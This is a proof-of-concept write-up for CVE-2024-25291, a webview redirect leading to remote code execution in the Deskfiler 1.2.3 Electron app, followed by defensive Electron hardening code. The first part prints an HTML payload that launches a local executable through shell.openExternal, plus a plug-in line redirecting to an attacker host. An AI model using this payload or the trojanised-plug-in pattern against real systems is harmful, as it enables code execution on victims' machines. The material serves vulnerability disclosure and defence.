A proof of concept (PoC) for the CVE-2024-25291 vulnerability.
deskfiler - 1.2.3 allows Electron webview in application, with resultant remote code
This repository contains an example vulnerable application and a proof-of-concept (PoC) exploit for it.
- Vulnerability Subject: Open Redirect leading to RCE
- Vulnerability Version: deskfiler-1.2.3
- Manifestation of the Issue: Electron Webview
- Attack Type: Remote Code Execution
- Attack Vectors: To exploit the vulnerability, someone must open the plug-in.
- Reserved CVE Number: CVE-2024-25291
- Exploit explanation
- A specific section of the application was confirmed to load an external link through an Electron webview. Because that webview can be pointed at an attacker-controlled server, it is possible to achieve RCE by connecting the webview to the attacker's server.
- Step 1) Prepare the attacker's server and create the malicious plug-in.
```html
<html>
<head>
<title>jruru</title>
</head>
<body>
<script>
const { shell } = require('electron');
shell.openExternal('file:C:/Windows/System32/calc.exe');
</script>
</body>
</html>
```
※ If you want to test quickly, start a server on the attacker's PC with the following command.
```shell
$ python -m http.server 80
```
Note: ※ Here the plug-in is assumed to be one generated by the attacker: an ordinary plug-in with a single line of code added so that it loads content from the attacker's server. BareBone was selected for simple testing.
Afterward, add the following line to the index.js file in the BareBone folder.
```javascript
window.location='http://[attacker_ip]/hack.html'
```
- Step 2) On the victim's machine, run Deskfiler and install the BareBone plug-in through "Add new plugin."
In this PoC we used a plug-in; however, we believe that RCE could also be achieved independently through alternative attack vectors. Additionally, if server-side vulnerabilities such as Stored XSS or Reflected XSS exist, RCE is also considered feasible.
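A hardening pattern for the Electron host side, added here as an example and not taken from Deskfiler or from this PoC: it disables Node integration for embedded pages, restricts webview navigation to an assumed allow-listed origin, and refuses to hand file: URLs to shell.openExternal, which is what the payload above relies on. The origin names, function names and the main-process wiring are assumptions.

```javascript
// Hardening example for an Electron app that embeds external content in a <webview>.
// Not Deskfiler's code; the allow-list and function names are assumptions.

// Assumed allow-list of origins the plug-in webview may navigate to.
const ALLOWED_ORIGINS = new Set(['https://plugins.example.invalid']);

// Schemes that may be passed to shell.openExternal. file: is deliberately absent,
// so a page cannot launch a local executable such as the calc.exe in the PoC.
const OPENABLE_SCHEMES = new Set(['https:', 'mailto:']);

function isAllowedNavigation(target) {
  let u;
  try { u = new URL(target); } catch (_) { return false; } // unparsable => deny
  return ALLOWED_ORIGINS.has(u.origin);
}

function isSafeToOpenExternally(target) {
  let u;
  try { u = new URL(target); } catch (_) { return false; }
  return OPENABLE_SCHEMES.has(u.protocol);
}

// webPreferences for the BrowserWindow that hosts the plug-in UI.
const hardenedWebPreferences = {
  nodeIntegration: false,   // pages cannot call require('electron')
  contextIsolation: true,
  sandbox: true,
  webviewTag: false,        // do not expose <webview> unless it is really needed
};

// Main-process guards: block off-list navigation, strip privileges from any
// attached <webview>, and route window.open through the external-URL policy.
function installGuards(electron) {
  electron.app.on('web-contents-created', (_event, contents) => {
    contents.on('will-navigate', (event, url) => {
      if (!isAllowedNavigation(url)) event.preventDefault();
    });
    contents.on('will-attach-webview', (event, webPreferences, params) => {
      delete webPreferences.preload;
      webPreferences.nodeIntegration = false;
      webPreferences.contextIsolation = true;
      if (!isAllowedNavigation(params.src)) event.preventDefault();
    });
    contents.setWindowOpenHandler(({ url }) => {
      if (isSafeToOpenExternally(url)) electron.shell.openExternal(url);
      return { action: 'deny' };
    });
  });
}

// Wire the guards only when actually running inside Electron.
let electron = null;
try { electron = require('electron'); } catch (_) { /* plain Node: policy only */ }
if (electron && electron.app) installGuards(electron);

module.exports = { isAllowedNavigation, isSafeToOpenExternally, hardenedWebPreferences, installGuards };
```

In plain Node the file only exposes the policy functions; under Electron the guards attach to every WebContents the app creates.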